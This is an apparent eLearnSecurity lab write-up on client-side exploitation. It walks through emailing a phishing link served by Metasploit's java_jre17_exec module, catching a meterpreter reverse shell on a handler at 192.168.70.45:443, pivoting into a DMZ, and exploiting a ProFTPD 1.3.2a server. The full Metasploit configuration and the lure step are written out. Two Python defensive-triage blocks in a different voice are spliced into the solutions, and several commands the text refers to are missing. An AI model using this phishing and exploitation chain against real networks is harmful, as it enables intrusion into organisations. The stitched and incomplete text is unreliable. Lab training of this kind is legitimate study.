HERA

LAB ID: 11

CLIENT-SIDE EXPLOITATION
Social Engineering
Client-side Exploitation
Pivoting
Linux FTP Service Exploitation
CLIENT-SIDE EXPLOITATION LAB ID: 11

1. LAB
You are a Penetration Tester and you're asked to determine if the
corporate network is secure and if we are able to reach the servers
within the DMZ. We have little information about our client (named
foocompany.com):

1) A few corporate email addresses

- [email protected]

- [email protected]

- [email protected]

2) The internal corporate network (10.10.50.0/23) is divided into two
segments: the internal network where the employees' machines reside and
the DMZ where the company servers are.

eLearnSecurity s.r.l. © 2013 | H E R A 2

2. GOALS

- Gain access to the internal network

- Exploit and get a shell to a server within the DMZ

3. WHAT YOU WILL LEARN

- How to use Client-Side attacks

- Pivoting

- Fingerprint Hosts and Services through Pivoting

To guide you during the lab you will find different Tasks.

Tasks are meant for educational purposes and to show you the usage of
different tools and different methods to achieve the same goal.

They are not meant to be used as a methodology.

Armed with the skills acquired through the tasks you can achieve the Lab
goal.

If this is the first time you do this lab, we advise you to follow these Tasks.

Once you have completed all the Tasks, you can proceed to the end of
this paper and check the solutions.

4. RECOMMENDED TOOLS

- metasploit

- nmap

- proxychains

- Mail client (e.g. Thunderbird)

5. IMPORTANT NOTE
Further information:

- Lab machines (like the web server and internal organization machines)
are not connected to the internet.

- In order to connect to the target organization and be able to send
emails to the target machines you have to create a new account in
your mail client with the following information:

POP/SMTP server IP address: 10.10.51.25

- POP3: 110 - NO SSL

- SMTP: 25 - NO SSL

Your username: attacker

Your password: attacker

The following images show how Thunderbird should be configured:

With this configuration you should be able to send email to and receive
email from the organization's email addresses.

NOTE: the mail server is out of our scope, so we will skip any test
against the address 10.10.50.25.

6. TASKS

Task 1: Find a way into the network

Since we only have the internal network IP addresses and they are not
directly reachable from the Internet, we have to think of a way to get into
the network. One way is to use client-side attacks against the employees in
order to gain access to their machines.

Task 1.1: Select an Exploit

Configure metasploit in order to create a link that points to an
exploit such as java_jre17_exec.

Task 1.2: Send the exploit

Once you have configured your exploit, send an email to the
corporate email addresses in order to lure the victim into clicking on it
and check whether they are vulnerable.

Task 2: Post-Exploitation

By now, you should have successfully exploited a machine in the
corporate network. Now run post-exploitation commands in order to find
as much information as possible regarding the machine and the network.
Are you able to find an IP address of a server that resides in the DMZ?

Task 3: Pivoting

Use the pivoting technique in order to reach the server in the DMZ.

Task 4: Verify the server version

Now that you have a connection to the server, run nmap in order to
discover what services and which versions of these services are in use.

Task 5: Exploit the server

You should now know that the server is running an FTP service and you
should know the daemon version. Find an exploit for that specific version
and try to exploit it!

Solutions

Task 1.1 – Select the Exploit

Since we have to use a client-side exploit we are going to select one of the
newest Java exploits: java_jre17_exec.

So let’s start metasploit and configure the module as follows:

//Select the module to use
msf > use exploit/multi/browser/java_jre17_exec
//Set the server host (our IP address)
msf exploit(java_jre17_exec) > set SRVHOST 192.168.70.45
//Set the URI path
msf exploit(java_jre17_exec) > set URIPATH /agenda
//Set the target to Windows
msf exploit(java_jre17_exec) > set TARGET 1
//Set the payload
msf exploit(java_jre17_exec) > set PAYLOAD windows/meterpreter/reverse_tcp
//Set the local host
msf exploit(java_jre17_exec) > set LHOST 192.168.70.45
//Set the local port
msf exploit(java_jre17_exec) > set LPORT 443
//Run the exploit
msf exploit(java_jre17_exec) > exploit

[*] Exploit running as background job
[*] Started reverse handler on 192.168.70.45:443
[*] Using URL: http://192.168.70.45:8080/agenda
[*] Server started.

Task 1.2 – Send the exploit

Now we have to lure the victim into opening this link. To do that we will
create an email as follows:

http://192.168.70.45:8080/agenda

After a few seconds we can see that something is happening in the
metasploit console. It seems that the user clicked the link in the mail and
we are getting a meterpreter shell, so the target is vulnerable to this Java
vulnerability.

Task 2: Post-Exploitation

Now that we have a meterpreter shell on this machine we can start the
data harvesting phase. Let's list the network interfaces and find out the
routes:

The IP address of the exploited machine is 10.10.50.8 and the default
gateway is 10.10.50.1. Let's continue our investigation.

We can verify which connections are active on the machine by issuing the
netstat command.

As we can see in the results, there is a connection to a host
(10.10.51.21) in the subnet 10.10.51.0/24. The process is named ftp and
the port is 21, so we can say that this is a connection to an FTP server that
maybe resides in the DMZ. Of course we cannot directly access this server
from our attacker machine, since it is on an internal network. Indeed if we
try a connection nothing happens:

In order to reach the server we have to use the exploited machine as a
bridge.
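The same netstat listing that Task 2 reads is what an incident responder pulls from a suspect workstation, so here is the triage as an added example (not the lab's own code): it groups established peers by the segments the brief describes and makes both tell-tale entries visible, the FTP session into the DMZ and the outbound connection back to the handler. The netstat rows and the 10.10.51.0/24 DMZ boundary are constructed from the lab's figures.

```python
import ipaddress
import re

# Segments from the lab brief: the corporate range 10.10.50.0/23 is split into an
# employee network and a DMZ, which the solution identifies as 10.10.51.0/24.
CORPORATE = ipaddress.ip_network("10.10.50.0/23")
DMZ = ipaddress.ip_network("10.10.51.0/24")

# Constructed sample in `netstat -ano` layout for the workstation 10.10.50.8 (not lab
# output): the FTP session to DMZ host 10.10.51.21 plus the 443 reverse connection.
SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       704
  TCP    10.10.50.8:49159       10.10.51.21:21         ESTABLISHED     1880
  TCP    10.10.50.8:49171       192.168.70.45:443      ESTABLISHED     2412
  TCP    10.10.50.8:49172       10.10.50.25:110        TIME_WAIT       0
"""

TCP_LINE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s+(\d+)\s*$")

def parse_tcp(text):
    """Yield (local_ip, local_port, remote_ip, remote_port, state, pid) per TCP row."""
    for line in text.splitlines():
        m = TCP_LINE.match(line)
        if m:
            lip, lport, rip, rport, state, pid = m.groups()
            yield lip, int(lport), rip, int(rport), state, int(pid)

def classify(remote_ip):
    """Place a peer address relative to the lab's network segments."""
    addr = ipaddress.ip_address(remote_ip)
    if addr.is_unspecified or addr.is_loopback:
        return None            # listening socket or local chatter, no peer to assess
    if addr in DMZ:
        return "dmz"           # workstation reaching across the segment boundary
    if addr in CORPORATE:
        return "internal"
    return "outside"           # beyond the corporate range: here, the reverse handler

def triage(text):
    """Group established peers by segment: {label: ["ip:port", ...]}."""
    groups = {"dmz": [], "internal": [], "outside": []}
    for _lip, _lport, rip, rport, state, _pid in parse_tcp(text):
        label = classify(rip)
        if label and state == "ESTABLISHED":
            groups[label].append(f"{rip}:{rport}")
    return groups
```

Calling triage(SAMPLE) returns the DMZ peer 10.10.51.21:21 and the outside peer 192.168.70.45:443, the two connections the rest of the lab builds on.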

Task 3: Pivoting

Let's use pivoting to send our traffic towards the other subnet. To do so
we can run the following command.

The previous command allows us to send the traffic to the subnet
10.10.51.0/24 through the meterpreter session of the exploited machine.

Since we want to run a version detection scan on the FTP server using
nmap, we have to configure a proxy through which all the nmap traffic will
pass. To do so let's put the meterpreter session in the background and
issue the following commands:

With this module (socks4a), all the traffic sent to our local address on port
1080 will go through metasploit. We can now use nmap with proxychains
in order to redirect the whole scan.

Note that proxychains should be configured with the following
parameters:

Task 4: Verify the server version

We can now run the scan by issuing the following command:

As we can see, using proxychains we are able to redirect the nmap traffic
through the metasploit proxy, which will then redirect it through the
meterpreter session.

Now that we know the FTP server version (ProFTPD v 1.3.2a) and that it is
running on Unix, we can search whether an exploit exists for this specific
version.
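From the defender's side, the version string nmap reports is the fact to act on: an added example (not the lab's own code) that pulls the product and version out of an nmap -sV report and orders ProFTPD-style versions (rc tags and maintenance letters included) so a scan result can be compared with a known-exploitable version. The scan excerpt is constructed around the lab's finding, and using 1.3.2a as the baseline is this example's assumption.

```python
import re

# Constructed `nmap -sV` excerpt for the DMZ host; it reproduces the product and
# version the lab's scan reports (ProFTPD 1.3.2a) but is not the lab's own output.
SAMPLE_SCAN = """\
Nmap scan report for 10.10.51.21
PORT   STATE  SERVICE VERSION
21/tcp open   ftp     ProFTPD 1.3.2a
80/tcp closed http
"""

# The version this lab shows a working Metasploit module against. Using it as the
# baseline is this example's assumption; it is not a vendor fix boundary.
EXPLOITED_VERSION = "1.3.2a"

# Port rows: "<port>/<proto> <state> <service> [<product> [<version>]]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(\S+)(?:\s+(\S+))?)?")
# ProFTPD-style versions: dotted numbers, then an optional rcN or maintenance letter
VERSION = re.compile(r"^(\d+(?:\.\d+)*)(?:rc(\d+)|([a-z]))?$")

def service_version(scan_text, port):
    """Return (product, version) for an open port, or None if nmap gave no version."""
    for line in scan_text.splitlines():
        m = PORT_LINE.match(line)
        if m and int(m.group(1)) == port and m.group(3) == "open":
            product, version = m.group(5), m.group(6)
            return (product, version) if product and version else None
    return None

def version_key(version):
    """Sortable key so that 1.3.2rc3 < 1.3.2 < 1.3.2a < 1.3.2b < 1.3.3."""
    m = VERSION.match(version)
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    numbers = tuple(int(n) for n in m.group(1).split("."))
    if m.group(2):                      # release candidate sorts before the release
        return numbers, 0, int(m.group(2))
    if m.group(3):                      # maintenance letter sorts after the release
        return numbers, 2, ord(m.group(3))
    return numbers, 1, 0

def at_or_below_exploited(scan_text, port=21):
    """True when the service on `port` is ProFTPD at or below EXPLOITED_VERSION."""
    found = service_version(scan_text, port)
    if not found or found[0] != "ProFTPD":
        return False
    return version_key(found[1]) <= version_key(EXPLOITED_VERSION)
```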

Task 5: Exploit the FTP server

Let's search whether there is an exploit for this specific version of the FTP
server, issuing the following command in metasploit:

As we can see, it exists. Let's then try to configure the module and exploit
the server.

As we can see, since we have already configured the pivoting we are able
to run the exploit against the address 10.10.51.21. Indeed we now have a
command shell on the FTP server and we can start gathering information
on it:
